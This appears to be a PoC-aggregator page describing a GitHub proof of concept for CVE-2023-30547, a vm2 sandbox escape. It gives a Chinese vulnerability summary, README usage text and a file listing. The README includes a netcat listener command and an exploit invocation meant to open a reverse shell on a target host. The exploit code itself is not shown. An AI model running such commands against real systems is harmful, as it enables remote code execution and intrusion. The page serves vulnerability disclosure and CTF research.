CVE-2023-30547 PoC — vm2 注入漏洞

Source

https://github.com/user0x1337/CVE-2023-30547

Associated Vulnerability

Title:vm2 注入漏洞 (CVE-2023-30547)
Description:vm2是捷克Patrik Simek个人开发者的一个 Node.js 的高级虚拟机/沙盒。以使用列入白名单的 Node 内置模块运行不受信任的代码。 vm2 3.9.17之前版本存在注入漏洞，该漏洞源于异常清理存在漏洞，攻击者利用该漏洞可以引发未清理的主机异常，该异常可用于逃逸沙箱并在主机上下文中运行任意代码。

Description

PoC to CVE-2023-30547 (Library vm2)

Readme

# CVE-2023-30547
This is a Proof-of-Concept to CVE-2023-30547 (https://nvd.nist.gov/vuln/detail/CVE-2023-30547). I created this PoC during a CTF.

## Usage
```bash
CVE-2023-30547 PoC [-h] [--url URL] [--lhost LHOST] [--lport LPORT]

PoC for the vm2 vulnerability CVE-2023-30547

options:
  -h, --help     show this help message and exit
  --url URL      Target URL
  --lhost LHOST  IP of the local host for a reverse shell
  --lport LPORT  Port of the local host for a reverse shell
```

## Example:
1. Terminal:
```bash
$ ncat -lnvp 1337
```
2. Terminal:
```bash
$ python3 exploit.py --url "http://vulnhost.local/run" --lhost 127.0.0.1 --lport 1337
```

File Snapshot


 [4.0K]  /data/pocs/289c3aa9ea3cad7f2e251f3e4e8fc3f87b60435d
├── [1.9K]  exploit.py
├── [ 18K]  LICENSE
└── [ 654]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!